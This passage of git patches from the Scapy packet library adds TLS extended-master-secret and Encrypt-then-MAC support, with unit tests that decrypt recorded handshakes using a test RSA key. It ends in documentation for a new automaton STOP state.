rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' += Reading TLS test session - Extended master secret +~ test + +# See https://github.com/secdev/scapy/issues/2784 + +from scapy.layers.tls.cert import PrivKey +from scapy.layers.tls.handshake import TLSFinished +from scapy.layers.tls.record import TLS + +chello_extms = hex_bytes(b'1603010200010001fc0303f8b3dbcb70ed3804009c15af4a4298720619b70d1ad4f24d0e99de9e93ce3c3b201c3b2cf3266bcba19b29479ec66fe815f7db0a6b976111f70958395e7aeebaba003e130213031301c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000175000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e31001600000017000000310000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602002b00050403040303002d00020101003300260024001d0020e8410f5ab09d96b05f10183ccd9e93a057a73290b4c9e1c254cdfc299fc01d41001500d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') +shello_extms = hex_bytes(b'160303005502000051030320a54032477ea3a963b8a700090459f11f1f4ad1896e1d75745b7e2bdc51dde0200600f552db6c51b97a309717ff847bb6e8fef1ce2601544413fda7b66075b887009d000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +finished_extms = hex_bytes(b'160303010610000102010007534dd8642e57edd33d156d8002f70562864c1dfe5d721763e8e4ef2c03fb14b4e4eac1864c41fcce57367f95798f04954ef957deb934536b0ac39a72c14f772d0f64b7cc0d8260e2019748fc65fd6f382da6d4f873afe6fc1fa17e786cf6c72b6a46950d2030c7b42ed10f2c4dba37282001132ddb151a44f6face6b049338217784cf2a5ac6a054a2a1d205fb7657d7affa14113c43314b54b28164423455174f57eb50f6eea0836ba1c68616db720641bf18f0cdf7bb729c9cc0b4cfeee8aeed94e00573210eb5328cbcca4ccb1aa29a910c5b5f2c96cf3a431e9677980400d574244ff6bfdabf36ba9dda84703f5760d607e4b731d4f1dc16372b0feac11403030001011603030028269118aa98b35c71e35034f35c23c78d55c04662cdb71c11b1ef862e3b4ebf8ace2aff053257bb08') +key = base64_bytes(b'LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2UUlCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktjd2dnU2pBZ0VBQW9JQkFRRFM5OU5ySXpwV0dUYVAKdzZmYkR5TmszSEdZYmRUdXZMN29XM2crRTV6K3NLZ041UUZIeVRhcWhDTU9MNkxya2U4WE4wRURoN2t5UkFySAp6OW84V1didStJOW9pOHZ1YWwwTitxQjF0MzMrZzI4c3N4ZzNYL1crS3pYMjFpM1h4TEZISWs5bjFUMlZ4L3pCCkhOcDd4aUkybTAxS2FGWlZGcCt5ajJibEVYSlBESnJ5OTA2a3pmQ2JrdmtYSkdwWUwyZjYzajcvZnNvc2VVMXgKUEJQNEROVS9oSHFobHRDdHdFU1VlUXBpampKL1MxUFFXNE1DWEQ2bFFSbGZsVHptL0RmdHpHaW8vVzdLWWg4NAp2QWk4TFkxeXo4MzRYR2o1OVBSSVd6SVRQR01wbjRYLzFpdmVXcDFZWGxxSmJ3Z3hsRWduZnhub2JWMW9lTHhUCmRvc3UrYk1oQWdNQkFBRUNnZ0VBSGQ5NTBISHNrTVNCTlZvL0tvVzZQVTM1eDl2Rml3aXUvN2YwRHRZNEpOaGUKODVpNTFiQm9UVHpvdWRtRStGWnh4SmZPWFBHYkI4TWF3N0JxOXFDeU1xUi9xZzRoa21EOVREMXcrenBBWFFtLwpkRlRuMk85OW5MQUJ0RElmeTYzT2JJUXZPa1MzczczZHpIcUpkWDFZMnVLaXp5WjNFeFZoQjZmR3Fpa09ScU1BCmNYbjJSRzN1UXFNWk4yUkVUK1hFYWdsa1dkbGphVTdaTC9CbklRT2xGS0h2ZzVSeGFwWGpJbTM2NnFUVStreGEKWDJFZnllOUJycWxWK0o4cnYzODVjRDBQc3RkSVFTQzMxZFBzUHMrSnJMVlBKQVpGZTBLVk1lYkk2ODU1cERYZApGd1ZGcC9BOXhFa3NwRW1jS0tnL1ZkZ3JQZUxMQmxhVm9mMVhPeUhWQVFLQmdRRHhPdXFGaXJvNTNQNGZQUGlMCkFnTTNvRnpmY2xwdDFMdnduelprUmVMU1NvVFBvZSt1R2xMdTBpS3lMUHBjWm1DTCt0bldsSXBheHRYOU1CRmUKOWNvMlJpSU9WM2JZM0ZpOTBLYjlvN3NyZURhaWE5NElHNGlBYktyWjJJdktBZmFkWnBqb1hBTXZpWnBEYWxGYgprZWVCd29nV0sreTdic2EwU1RYTGVMdjF5d0tCZ1FEZjRwT2lUZ3RBNFdtMXo2WFB4Z0ZCa3A3OWVjaWhINTlICnF1cVJNNkhtQ2YzSnZqZzJCZnYyb2hYNTlTU2VnZTI5ek0yZEhmVGhSeW1vZlg5VkpyMnRYY2FhVWpkRnp1Ui8Kcm1EblJMTjVDTUFnUWNCU3M5UXFCaXdTM0hqVmpML1REcFMvblJwY2VCQnNZTFYvR1YvQkpvWDkxTlVodVRXcwpjQ0VvRmNVOVF3S0JnUUNjbCtGTHhTMTBpSGZTY1hMcVVla2l3QS9wNFVMQWoxdGRMUTFTOUdiMG1ma3pDKzBaCitPNmpKM2ZzYi9RcDdTOTVUdU1BUDdhOGpOeTJtZkI4MDFOci9nVDNpR0dYRHhyd1JUVlI2MnFDSW14YzdXYloKbm4zeTJCZmtpSVRlSW40ajJVa2pkUytBT1hRUmxUK3hFTHJXNmlBTFBJSlZmZWl4ZWVEWTc4d2NGd0tCZ0Z5aQoxcTFvbDNWd0Q1cGY0ZDdYc2Z0YzNKWkxCcjNNWk01MXBQc1JueUtjN2JyRkQyTWpGTDlYRDdyT09TbXczeHNTCm05MHY0UHc1d3IzcHQzOFhPWko3WThyRXpBUUJlRUJ3ZWI0WGloOUJoS1dVTHl6SkpiZUJ1RWpSbXRuWmxDR1QKUGU4TzVUSnZwM1FBaS9pY0dpZkVkZHF5YnNHMmJjUDgzV3RGbnNnYkFvR0FMOHF4VUx3bGlMck1ML3c3aEJNegpXSHdKM21PK0NXbzFWR3p4bi9lK3I2ejVTUW03M0VuYzlSZnVkN3RBWmU1QUhXYXVSR3RNaVNoY0J1bkl5Q0g1CnU2Q2laZU5UOTBRdElLRmVCS09QSk5WNDR1QzJtK0xKQkNGa0hzU085MHp0dHZzcmVyU0tiNG5oZ2tiZDhxQ24KbDVFZFBpZEx2NXdiY0tyc3dIVzZYSm89Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0=') +# Load key +ssl_key = PrivKey(key) + +# Load TLS session +r1 = TLS(chello_extms) +r1.tls_session.server_rsa_key = ssl_key +r2 = TLS(shello_extms, tls_session=r1.tls_session.mirror()) +r3 = TLS(finished_extms, tls_session=r2.tls_session.mirror()) + +r3 + +assert r3.tls_session.extms +assert r3.tls_session.session_hash == b'\n\x8b\xe0\x08S\xb9f|\xd4\x1f\xc5\x8f\xdb\xfaj\xc6\xb4Aj\\j~B)Ep\x07\x90\xc6/\x18\x1e\x99\x1e\x8d.\xe2,B\xe1\x10ZJ\x10^\xect(' + +l3 = r3.getlayer(TLS, 3) +assert isinstance(l3.msg[0], TLSFinished) +assert l3.msg[0][TLSFinished].vdata == b'\x00\x1fG\xd8VD@\x0ctK\xeee' + ### ### Other/bug tests ### From 26fd314153bd1ead64ddbd36a74e8c423b242411 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 14 Sep 2020 17:43:55 +0000 Subject: [PATCH 0297/1632] Use Hash from PRF for TLS 1.2 --- scapy/layers/tls/crypto/prf.py | 7 +++---- scapy/layers/tls/handshake.py | 8 ++++++-- test/tls.uts | 20 ++++++++++++++++++++ 3 files changed, 29 insertions(+), 6 deletions(-) diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index 5d1b39b6f8d..210f9108c09 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -203,6 +203,8 @@ def __init__(self, hash_name="SHA256", tls_version=0x0303): elif hash_name == "SHA512": self.prf = _tls12_SHA512PRF else: + if hash_name in ["MD5", "SHA"]: + self.hash_name = "SHA256" self.prf = _tls12_SHA256PRF else: warning("Unknown TLS version") @@ -293,10 +295,7 @@ def compute_verify_data(self, con_end, read_or_write, s2 = _tls_hash_algs["SHA"]().digest(handshake_msg) verify_data = self.prf(master_secret, label, s1 + s2, 12) else: - if self.hash_name in ["MD5", "SHA"]: - h = _tls_hash_algs["SHA256"]() - else: - h = _tls_hash_algs[self.hash_name]() + h = _tls_hash_algs[self.hash_name]() s = h.digest(handshake_msg) verify_data = self.prf(master_secret, label, s, 12) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 61d4a9f843a..65458e9e53c 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1313,9 +1313,13 @@ def tls_session_update(self, msg_str): if self.tls_session.extms: to_hash = b''.join(self.tls_session.handshake_messages) + # https://tools.ietf.org/html/rfc7627#section-3 if self.tls_session.tls_version >= 0x303: - # TLS 1.2 uses the default hash from cipher suite - hash_object = self.tls_session.pwcs.hash + # TLS 1.2 uses the same Hash as the PRF + from scapy.layers.tls.crypto.hash import _tls_hash_algs + hash_object = _tls_hash_algs.get( + self.tls_session.prcs.prf.hash_name + )() self.tls_session.session_hash = hash_object.digest(to_hash) else: # Previous TLS version use concatenation of MD5 & SHA1 diff --git a/test/tls.uts b/test/tls.uts index 32c40d0a766..40e80840392 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1010,6 +1010,26 @@ l3 = r3.getlayer(TLS, 3) assert isinstance(l3.msg[0], TLSFinished) assert l3.msg[0][TLSFinished].vdata == b'\x00\x1fG\xd8VD@\x0ctK\xeee' +# RC4 case + +chello_extms = hex_bytes(b'160301008501000081030360037703ac90bb5e29ae0fca71b68dd8133b17b7060c13779d34f69d5c3255110000060005000400ff01000052337400000010000e000c02683208687474702f312e310016000000170000000d0030002e040305030603080708080809080a080b080408050806040105010601030302030301020103020202040205020602') +shello_extms = hex_bytes(b'1603030055020000510303c985430a03add71566a952a16249e471cd3226c0792ba42c444f574e4752440120e835d66cd3293b9fcb157d5c477848d654a2d3a42fc92bcf9c472171188f69610005000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +finished_extms = hex_bytes(b'16030301061000010201004971b89ae4355a001c49ccb49ed0664a9090a2dc0c14c97563b6dd98f13004ac5327c97abf10617b1f5d19b1f6e1091ccf159693497ebda262aedba2f3b76ae217d56477cad45e2ea129c324083701c2e99e65b6d63f916f963de8d98c5357d22272c032a30acccd673d1556d01e22e206186bcda3a5845d6dacee260ab66f47ea86a4c0081faa082b398f2c65da35264428f320c354b97cd96c986da43c8510e914ffb7f8bb73baee2530c4533ae2d6a922771af689c15b42c53428978510a3e3e90a3806f77fc1cb35c2c3f34dd7e3f831a79bc59b333f0c9e8be49390cd2a8e1c88dafbb9e3e24d1e0530703dbff7cd1c516fcc21a7d484f2111f985f03f8140303000101160303002457ed5c62171e4720a5890cf9ef09323f6e2db063aeebea776a54b879ffb6a69182d15cae') + +# Load TLS session +r1 = TLS(chello_extms) +r1.tls_session.server_rsa_key = ssl_key +r2 = TLS(shello_extms, tls_session=r1.tls_session.mirror()) +r3 = TLS(finished_extms, tls_session=r2.tls_session.mirror()) + +assert r3.tls_session.extms +assert r3.tls_session.pwcs.prf.hash_name == "SHA256" +assert r3.tls_session.session_hash == b'2\xdc\xf5\xcb\xbc\x99\xc6IV\xba\x0f.\x0bdq\x1f=\xef\xdaW\xfc*A\x9b\xe2?b\xccKW\xe9\xb7' + +l3 = r3.getlayer(TLS, 3) +assert isinstance(l3.msg[0], TLSFinished) +assert l3.msg[0][TLSFinished].vdata == b'\x15\xd6\xd5\xea\x84\xee\xb3\xdd\xd6\x10\xd8\x11' + ### ### Other/bug tests ### From 12ddd5b9ae8d87046ccad6e8008141e7a92571da Mon Sep 17 00:00:00 2001 From: strayge Date: Sat, 12 Sep 2020 23:40:04 +0300 Subject: [PATCH 0298/1632] added Encrypt-then-MAC support for TLS --- scapy/layers/tls/handshake.py | 7 ++-- scapy/layers/tls/record.py | 64 +++++++++++++++++++---------------- scapy/layers/tls/session.py | 2 ++ test/tls.uts | 39 +++++++++++++++++++++ 4 files changed, 80 insertions(+), 32 deletions(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 65458e9e53c..e504b97fcee 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -49,7 +49,8 @@ TLS_Ext_SupportedVersion_SH, TLS_Ext_EarlyDataIndication, _tls_hello_retry_magic, - TLS_Ext_ExtendedMasterSecret) + TLS_Ext_ExtendedMasterSecret, + TLS_Ext_EncryptThenMAC) from scapy.layers.tls.keyexchange import (_TLSSignature, _TLSServerParamsField, _TLSSignatureField, ServerRSAParams, SigAndHashAlgsField, _tls_hash_sig, @@ -542,12 +543,12 @@ def tls_session_update(self, msg_str): s.server_random = self.random_bytes s.sid = self.sid - # EXTMS if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_ExtendedMasterSecret): self.tls_session.extms = True - break + if isinstance(e, TLS_Ext_EncryptThenMAC): + self.tls_session.encrypt_then_mac = True cs_cls = None if self.cipher: diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index d0031e909cc..992eb9f4432 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -445,9 +445,32 @@ def pre_dissect(self, s): cipher_type = self.tls_session.rcs.cipher.type + def extract_mac(data): + """Extract MAC.""" + tmp_len = self.tls_session.rcs.mac_len + if tmp_len != 0: + frag, mac = data[:-tmp_len], data[-tmp_len:] + else: + frag, mac = data, b"" + return frag, mac + + def verify_mac(hdr, cfrag, mac): + """Verify integrity.""" + chdr = hdr[:3] + struct.pack('!H', len(cfrag)) + is_mac_ok = self._tls_hmac_verify(chdr, cfrag, mac) + if not is_mac_ok: + pkt_info = self.firstlayer().summary() + log_runtime.info( + "TLS: record integrity check failed [%s]", pkt_info, + ) + if cipher_type == 'block': version = struct.unpack("!H", s[1:3])[0] + if self.tls_session.encrypt_then_mac: + efrag, mac = extract_mac(efrag) + verify_mac(hdr, efrag, mac) + # Decrypt try: if version >= 0x0302: @@ -481,19 +504,11 @@ def pre_dissect(self, s): mfrag, pad = pfrag[:-padlen], pfrag[-padlen:] self.padlen = padlen - # Extract MAC - tmp_len = self.tls_session.rcs.mac_len - if tmp_len != 0: - cfrag, mac = mfrag[:-tmp_len], mfrag[-tmp_len:] + if self.tls_session.encrypt_then_mac: + cfrag = mfrag else: - cfrag, mac = mfrag, b"" - - # Verify integrity - chdr = hdr[:3] + struct.pack('!H', len(cfrag)) - is_mac_ok = self._tls_hmac_verify(chdr, cfrag, mac) - if not is_mac_ok: - pkt_info = self.firstlayer().summary() - log_runtime.info("TLS: record integrity check failed [%s]", pkt_info) # noqa: E501 + cfrag, mac = extract_mac(mfrag) + verify_mac(hdr, cfrag, mac) elif cipher_type == 'stream': # Decrypt @@ -504,21 +519,8 @@ def pre_dissect(self, s): cfrag = e.args[0] else: decryption_success = True - mfrag = pfrag - - # Extract MAC - tmp_len = self.tls_session.rcs.mac_len - if tmp_len != 0: - cfrag, mac = mfrag[:-tmp_len], mfrag[-tmp_len:] - else: - cfrag, mac = mfrag, b"" - - # Verify integrity - chdr = hdr[:3] + struct.pack('!H', len(cfrag)) - is_mac_ok = self._tls_hmac_verify(chdr, cfrag, mac) - if not is_mac_ok: - pkt_info = self.firstlayer().summary() - log_runtime.info("TLS: record integrity check failed [%s]", pkt_info) # noqa: E501 + cfrag, mac = extract_mac(pfrag) + verify_mac(hdr, cfrag, mac) elif cipher_type == 'aead': # Authenticated encryption @@ -671,7 +673,8 @@ def post_build(self, pkt, pay): if cipher_type == 'block': # Integrity - mfrag = self._tls_hmac_add(hdr, cfrag) + if not self.tls_session.encrypt_then_mac: + cfrag = self._tls_hmac_add(hdr, cfrag) # Excerpt below better corresponds to TLS 1.1 IV definition, # but the result is the same as with TLS 1.2 anyway. @@ -681,7 +684,7 @@ def post_build(self, pkt, pay): # mfrag = iv + mfrag # Add padding - pfrag = self._tls_pad(mfrag) + pfrag = self._tls_pad(cfrag) # Encryption if self.version >= 0x0302: @@ -695,6 +698,9 @@ def post_build(self, pkt, pay): # Implicit IV for SSLv3 and TLS 1.0 efrag = self._tls_encrypt(pfrag) + if self.tls_session.encrypt_then_mac: + efrag = self._tls_hmac_add(hdr, efrag) + elif cipher_type == "stream": # Integrity mfrag = self._tls_hmac_add(hdr, cfrag) diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 6ab6d52fe60..e3b342e25d7 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -457,6 +457,8 @@ def __init__(self, self.extms = False self.session_hash = None + self.encrypt_then_mac = False + # All exchanged TLS packets. # XXX no support for now # self.exchanged_pkts = [] diff --git a/test/tls.uts b/test/tls.uts index 40e80840392..4a583b715af 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1030,6 +1030,32 @@ l3 = r3.getlayer(TLS, 3) assert isinstance(l3.msg[0], TLSFinished) assert l3.msg[0][TLSFinished].vdata == b'\x15\xd6\xd5\xea\x84\xee\xb3\xdd\xd6\x10\xd8\x11' += Reading TLS test session - Encrypt-then-MAC extension +from scapy.layers.tls.cert import PrivKey +from scapy.layers.tls.handshake import TLSFinished +from scapy.layers.tls.record import TLS + +client_hello = hex_bytes(b'16030100c9010000c50303611a2f42b70345cfbc5c5c4da1929bea8a2cb8b1fd10ab1341e43ffaa8856a63000038c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000064000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e310016000000170000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602') +server_hello = hex_bytes(b'1603030059020000550303a22c975875df69bea936cbd28b083cde754693b4f34a15a036e5e57b7f4755cf20226e6386f90e3751723beea9196640d5bbe6c7c9f314568fa3645cb7218e9159003d00000dff010001000016000000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +client_finished = hex_bytes(b'1603030106100001020100482bf86fa7047c767ecc5f46e971f2349232d57d4c40b04856b6ea2b5645b5b233c0cd2ad7b05101d6a3fcbd2698b25064501ba4f0cde40c8189abc29aebfffcb87413d4590cae7cf3589fa371ad5e0d161da9c275a4b8ca1aa9a400a3d76021f92b872403a72a22bad6368276010209ca1344971adf7d7a9cdeefd534cd933ec3d2852ea1dfff217f7cd55eac7d2b18f7c5600c56f28746389d1d6c33cd2ac24817632fc0fbd81ffcf528b1c2a5b328a0105e88513e6b2f95b51ca3adf390146662115a721bfd718eae3033388aaa5cb37e2c16428a6f7c994f961137f6a7f933327ed300f15621500d427d261f39970bbf40f4ba303963609439007d34e6bc1403030001011603030050f4b7962d5455e9244efe886bbd4156ca20936e4b8868d80c82b06ceac7cff6d69f130a610f2aa4c4fd8cb2681f84e3ebecad1b563bcd258255aa509ba2b6388f90ac5f1c1f84f1569dc3809667b86ba4') +server_finished = hex_bytes(b'14030300010116030300509e8e5fd6aebaa98263e98266fffcf7fd21eb50fb0510b8598660afb65c57a025374c1e63aff3e260dd5d027180e8aa0d85d43e0c0b54e8783e4ce51a71ef0ae555ab81404020342ca1a34643ce713688') + +# Load TLS session +r1 = TLS(client_hello) +r1.tls_session.server_rsa_key = ssl_key +r2 = TLS(server_hello, tls_session=r1.tls_session.mirror()) +r3 = TLS(client_finished, tls_session=r2.tls_session.mirror()) +r4 = TLS(server_finished, tls_session=r3.tls_session.mirror()) + +client_finished = r3.getlayer(TLS, 3).msg[0] +server_finished = r4.getlayer(TLS, 2).msg[0] + +assert r4.tls_session.encrypt_then_mac +assert isinstance(client_finished, TLSFinished) +assert isinstance(server_finished, TLSFinished) +assert client_finished.vdata == hex_bytes(b'771049b4ff714ac71253f84f') +assert server_finished.vdata == hex_bytes(b'42c9765e833997b6714fec75') + ### ### Other/bug tests ### @@ -1230,6 +1256,19 @@ ch.ext = [ext1, ext2, ext3, ext4, ext5, ext6, ext7, ext8, ext9] t = TLS(type='handshake', version='TLS 1.0', msg=ch) raw(t) == b'\x16\x03\x01\x00\xc7\x01\x00\x00\xc3\x03\x03&\xee-\xddX\xe1\xb1T\xaa\xb1\x0b\xa0zlg\xf8\xd14]%\xa9\x91d\x08\xc7t\xcd6\xd4"\x9f\xcf\x00\x00\x16\xc0+\xc0/\xc0\n\xc0\t\xc0\x13\xc0\x14\x003\x009\x00/\x005\x00\n\x01\x00\x00\x84\x00\x00\x00\x11\x00\x0f\x00\x00\x0cmn.scapy.wtv\xff\x01\x00\x01\x00\x00\n\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00#\x00\x003t\x00\x00\x00\x10\x00)\x00\'\x05h2-16\x05h2-15\x05h2-14\x02h2\x08spdy/3.1\x08http/1.1\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\r\x00\x16\x00\x14\x04\x01\x05\x01\x06\x01\x02\x01\x04\x03\x05\x03\x06\x03\x02\x03\x04\x02\x02\x02' += Building packets - application data with Encrypt-then-MAC +session = tlsSession( + rcs=connState(ciphersuite=TLS_RSA_WITH_AES_256_CBC_SHA256), + wcs=connState(ciphersuite=TLS_RSA_WITH_AES_256_CBC_SHA256), +) +session.encrypt_then_mac = True +session.tls_version = 0x0303 +session.rcs.cipher.key = b'A' * 32 +session.wcs.cipher.key = b'A' * 32 +payload = b'PAYLOAD' +tlsdata = TLS(msg=TLSApplicationData(data=payload), tls_session=session) +t = TLS(raw(tlsdata), tls_session=session.mirror()) +assert t[0].msg[0].data == payload = Building packets - ServerHello context linking from scapy.layers.tls.crypto.kx_algs import KX_ECDHE_RSA From 1a7061988050f0183868385fc261ed01d1187156 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 3 Oct 2020 20:20:07 +0200 Subject: [PATCH 0299/1632] Automaton: add STOP state --- doc/scapy/advanced_usage.rst | 56 ++++++++++- doc/scapy/graphics/ATMT_TCP_client.svg | 130 +++++++++++++++++++++++++ scapy/automaton.py | 33 ++++++- scapy/layers/inet.py | 27 +++++ scapy/layers/tls/automaton_cli.py | 4 + scapy/layers/tls/automaton_srv.py | 2 +- 6 files changed, 243 insertions(+), 9 deletions(-) create mode 100644 doc/scapy/graphics/ATMT_TCP_client.svg diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index d06785c724a..09967489694 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -527,7 +527,7 @@ Let's begin with a simple example. I take the convention to write states with ca In this example, we can see 3 decorators: * ``ATMT.state`` that is used to indicate that a method is a state, and that can - have initial, final and error optional arguments set to non-zero for special states. + have initial, final, stop and error optional arguments set to non-zero for special states. * ``ATMT.condition`` that indicate a method to be run when the automaton state reaches the indicated state. The argument is the name of the method representing that state * ``ATMT.action`` binds a method to a transition and is run when the transition is taken. @@ -681,7 +681,9 @@ Decorators Decorator for states ~~~~~~~~~~~~~~~~~~~~ -States are methods decorated by the result of the ``ATMT.state`` function. It can take 3 optional parameters, ``initial``, ``final`` and ``error``, that, when set to ``True``, indicating that the state is an initial, final or error state. +States are methods decorated by the result of the ``ATMT.state`` function. It can take 4 optional parameters, 